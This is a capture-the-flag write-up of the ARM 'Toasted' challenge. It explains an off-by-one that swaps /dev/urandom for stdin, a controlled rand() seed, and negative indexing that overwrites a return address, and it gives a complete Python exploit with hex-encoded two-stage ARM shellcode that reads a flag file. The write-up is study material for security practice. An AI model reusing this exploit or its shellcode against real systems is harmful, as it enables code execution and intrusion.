Description

Toasted is a statically linked 32-bit ARM pwnable running in qemu-user provided by the challenge creator. The main function is easy to read and produces the following pseudo-code:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int argc_; // ST04_4@1
  int urand_open_flags; // r2@1
  int seed; // [sp+8h] [bp+8h]@3
  int enable_debug; // [sp+Ch] [bp+Ch]@1
  char ctxt[256]; // [sp+10h] [bp+10h]@1
  char stackbuf[32]; // [sp+110h] [bp+110h]@3
  int urandom_fd; // [sp+130h] [bp+130h]@3
  int _canary; // [sp+134h] [bp+134h]@3

  argc_ = argc;
  enable_debug = 0;
  setvbuf(stdout, 0, 2, 0);
  memset(ctxt, 0, 0x100);
  if ( argc_ > 1 )
  {
    urand_open_flags = 1;
    enable_debug = 1;
  }
  urandom_fd = (int)open("/dev/urandom", 0, urand_open_flags);
  read(urandom_fd, &gcanary, 4);
  _canary = gcanary;
  puts("Welcome to Internet of Toaster!\nFeaturing \"Random Heat Distribution\" (patent pending)");
  checkpass(stackbuf);
  printf("This next-gen toaster allows for %d slices of bread !\n", 256);
  puts("It also has a small tank of replacement bread if you burn one, which is a huge improvement over the netbsd-based models!");
  read(urandom_fd, &seed, 4);
  srandom(seed);
  handle_bread(ctxt, enable_debug);
  puts("Well, you've had your toasting frenzy!\nCheers");
  if ( _canary != gcanary )
    exit(-1);
  return 0;
}

The char ctxt[256] stack buffer will become very important later on. The program opens "/dev/urandom" and reads out 4 bytes, used as a random stack canary. Once this is done, main calls into checkpass:

int __fastcall checkpass(char *pwd)
{
  char *_pwd; // [sp+4h] [bp+4h]@1
  int _canary; // [sp+8h] [bp+8h]@1
  int read_len; // [sp+Ch] [bp+Ch]@1

  _pwd = pwd;
  _canary = gcanary;
  printf("Passphrase : ");
  read_len = read(0, _pwd, 0x20);
  if ( read_len < 0 )
    exit(-1);
  _pwd[read_len] = 0;
  if ( strcmp(gpassw, _pwd) )
  {
    puts("Access denied!\nNo toast today :-(");
    exit(-1);
  }
  if ( _canary != gcanary )
    exit(0);
  return puts("Access granted!");
}

There is an obvious off-by-1 error happening: _pwd[read_len] = 0;

The _pwd buffer is only 0x20 bytes long. If we send 0x20 bytes, this function will write a \x00 byte at the 21st array position (index 0x20). We can exploit this to override the file descriptor stored on the stack for urandom:

  char stackbuf[32]; // [sp+110h] [bp+110h]@3
  int urandom_fd; // [sp+130h] [bp+130h]@3

More accurately, we can override the lowest byte of the file descriptor integer, but this is enough to change the file descriptor to 0 because the upper bytes are already zero. Thus, we replace urandom with stdin, neat.

The main function reads out 4 bytes from the urandom (now stdin) file descriptor, and uses this value as a seend for the libc pseudo random number generator. Thus we can control the seed and the resulting sequence of PRNG outputs, which will be important later on.

The remainder of the application logic relevant to our interests can be found in the handle_bread function. Pseudo-code for this function:

unsigned int __fastcall handle_bread(char *ctxt, int flag)
{
  unsigned int r; // r0@3
  int current_slice; // r4@10
  int _flag; // [sp+0h] [bp+0h]@1
  char *_ctxt; // [sp+4h] [bp+4h]@1
  int slice_num_signed; // [sp+Ch] [bp+Ch]@8
  char slice; // [sp+10h] [bp+10h]@6
  unsigned int new_slice_value; // [sp+14h] [bp+14h]@10
  int canary; // [sp+18h] [bp+18h]@1
  int i; // [sp+1Ch] [bp+1Ch]@1

  _ctxt = ctxt;
  _flag = flag;
  i = 0;
  canary = gcanary;
  do
  {
    if ( overheat == 4 )
      return puts("The bread reserve tank is empty... Quitting");
    if ( _flag )
    {
      puts("Bread status: ");
      show_bread(_ctxt);
    }
    puts("Which slice do you want to heat?");
    r = read(0, &slice, 4);
    if ( slice == 'q' || slice == 'x' )
      return r;
    r = _isoc99_sscanf(&slice, "%d", &slice_num_signed);
    if ( r && slice_num_signed <= 255 )
    {
      printf("Toasting %d!\n", slice_num_signed);
      current_slice = (unsigned __int8)_ctxt[slice_num_signed];
      r = rand();
      new_slice_value = current_slice + (int8)r;
      if (new_slice_value <= 256)
      {
        _ctxt[slice_num_signed] = new_slice_value;
      }
      else
      {
        r = puts("Detected bread overheat, replacing");
        _ctxt[slice_num_signed] = 0;
        ++overheat;
      }
      ++i;
    }
  }
  while ( i <= 259 );
  if ( canary != gcanary )
    exit(-1);
  return r;
}

To summarize:

  • Read user input (integer string), convert to signed integer using scanf.
  • Set r = rand().
  • Set _ctxt[index] += r.
  • If _ctxt[index] > 0xff, set _ctxt[index] = 0 and increase overflow counter by one.
  • If overflow == 4 or number of iterations > 259, exit.

Since we control the rand() seed, we know the output of rand() beforehand. By using the correct indices for the correct PRNG bytes, we can set the contents of the _ctxt buffer on the stack to whatever we want (e.g. shellcode). Additionally, the user-provided index is converted to a signed integer but never checked for >= 0, which means we can provide negative indices to override the return address as well as the integer i to give us more PRNG iterations.

Battle-plan:

  1. Choose a good seed that can give us all the bytes we need in only a few iterations.
  2. Write bytes at correct offsets in the _ctxt buffer to place shellcode onto the buffer.
  3. Override return address to jump to the stack buffer.

Even though the binary does not declare an executable stack, ARM QEMU is kind enough to execute the stack anyway (sorry, creator of the challenge!). So we don't need to ROP and can simply load shellcode to do what we want. During our tests we could not find a proper seed for the large shellcode we had, so we wrote a 2-stage shellcode instead. The first one calls read() again to load more code, which finally reads out the flag file and writes it to standard output.

The exploit code:

#!/usr/bin/env python
# @skusec, @naehrwert

from Pwn import *

import os
import sys
import re
import struct
import ctypes

# _ctxt[-36] points to the index integer i.
SLOT_I = -36

# _ctxt[-20] points to the return address.
SLOT_LR = -20

# Load libc for srand/rand.
libc = ctypes.cdll.LoadLibrary('libc.so.6')

s = Socket()
s.connect('toasted.insomnihack.ch', 7200)

# open("/flag"); read(); write(); ARM shellcode.
shellcode_2 = '05 70 A0 E3 2C 00 9F E5 00 10 A0 E3 01 20 A0 E3 00 00 00 EF 03 70 A0 E3 1C 10 9F E5 10 20 A0 E3 00 00 00 EF 04 70 A0 E3 00 00 A0 E3 08 10 9F E5 10 20 A0 E3 00 00 00 EF 98 ED FF F6 9E ED FF F6 2F 66 6C 61 67 00'
shellcode_2 = map(lambda x: chr(int(x, 16)), shellcode_2.split(' '))
shellcode_2 = ''.join(shellcode_2)

# read() THUMB ARM shellcode to load more shellcode.
shellcode = 'E1 BF 03 27 00 20 02 49 60 22 00 DF 00 48 80 47 58 ED FF F6'
shellcode = map(lambda x: chr(int(x,16)), shellcode.split(' '))

# Build the shellcode puzzle. We need these bytes (except for 0-bytes, as _ctxt
# is memsetted to zero anyway).
shellcode_puzzle = []
for i in xrange(len(shellcode)):
    if shellcode[i] != '\x00':
        shellcode_puzzle.append({'offset': i, 'value': shellcode[i], 'completed': False})

# Additionally, we need to change LR on the stack.
STACK = 0xf6fffcb8

# Change return address to THUMB mode (odd address).
shellcode_puzzle.append({'offset': SLOT_LR + 0, 'value': chr(((0xb8 | 1) - 0x93) & 0xff), 'completed': False})
shellcode_puzzle.append({'offset': SLOT_LR + 1, 'value': chr((0xfc - 0x8c) & 0xff), 'completed': False})
shellcode_puzzle.append({'offset': SLOT_LR + 2, 'value': chr((0xff - 0x00) & 0xff), 'completed': False})
shellcode_puzzle.append({'offset': SLOT_LR + 3, 'value': chr((0xf6 - 0x00) & 0xff), 'completed': False})

# We can use these indices to place garbage bytes that we don't need.
overheat_map = []
for i in xrange(len(shellcode) + 5, 0x100):
    overheat_map.append({'offset': i, 'value': 0})
for i in xrange(-700, -340):
    overheat_map.append({'offset': i, 'value': 0})

# Send password and override urandom fd.
s.readuntil('Passphrase :')
s.sendall('How Large Is A Stack Of Toast?\n\x00')

# Send PRNG seed. Aren't we sneaky.
# Found this through trial and error.
# I am massively disappointed by 0xdeadbeef.
SEED=383611110
s.sendall(struct.pack('<I', SEED))
libc.srand(SEED)

# Do the toasting game....
current_garbage_slot = len(shellcode) + 1
num_iterations = 0
num_iterations_total = 0
num_overflows = 0
did_the_thing = False

while any(map(lambda item: not item['completed'], shellcode_puzzle)):
    # Get next PRNG output, and check its usefulness.
    r = libc.rand() & 0xff
    rc = chr(r)

    # Check if we need this.
    offset = -1
    for item in shellcode_puzzle:
        if item['value'] == rc and not item['completed']:
            offset = item['offset']
            item['completed'] = True
            break

    if offset == -1:
        # We definitely do not need this byte.
        # Maybe we should reset the counter.
        if num_iterations == 255 and num_overflows < 3 and r >= 2:
            num_overflows += 1
            slot = SLOT_I
            num_iterations = 0
        else:
            slot = -1
            # Find the best garbage slot.
            for item in overheat_map:
                if r + item['value'] < 0x100:
                    slot = item['offset']
                    item['value'] += r
                    break

            # No slot found? We need to overflow.
            if slot == -1:
                if num_overflows < 3:
                    # Could not find a good garbage slot without overheating,
                    # so now we WILL overheat. Find the largest one to overheat.
                    max_item = None
                    max_value = 0
                    for item in overheat_map:
                        if item['value'] > max_value:
                            max_value = item['value']
                            max_item = item

                    max_item['value'] = 0
                    slot = max_item['offset']
                    num_overflows += 1
                else:
                    assert False, 'too many overheats..'
    else:
        # We do need this byte for our shellcode / return address.
        slot = offset

    # Send slot.
    s.readuntil('heat?\n').strip()
    print('Setting slot %d to byte %02x' % (slot, r))
    s.sendall(('%d\n' % (slot)).ljust(4, ' '))
    s.readuntil('Toasting').strip()
    s.readuntil('\n')

    num_iterations += 1
    num_iterations_total += 1
    print('Num iterations: %d (total: %d)' % (num_iterations, num_iterations_total))
    print('Num remaining: %d' %  (len(filter(lambda item: not item['completed'], shellcode_puzzle))))


s.sendall('q\n')
raw_input('Enter to send stage 2 shellcode..')
s.sendall(shellcode_2.ljust(0x60, '\x00'))
raw_input('Lets see what this button does..')
print s.recv(1024)

Output: INS{_-n0_pa1n_n0qemu: uncaught target signal 4 (Illegal instruction) - core dumped

Our shellcode only reads 0x10 bytes from the flag file (smart, right?), so we didn't get the complete flag, but it's not hard to guess what the rest should be: INS{-n0_pa1n_n0_ga1n-} :-)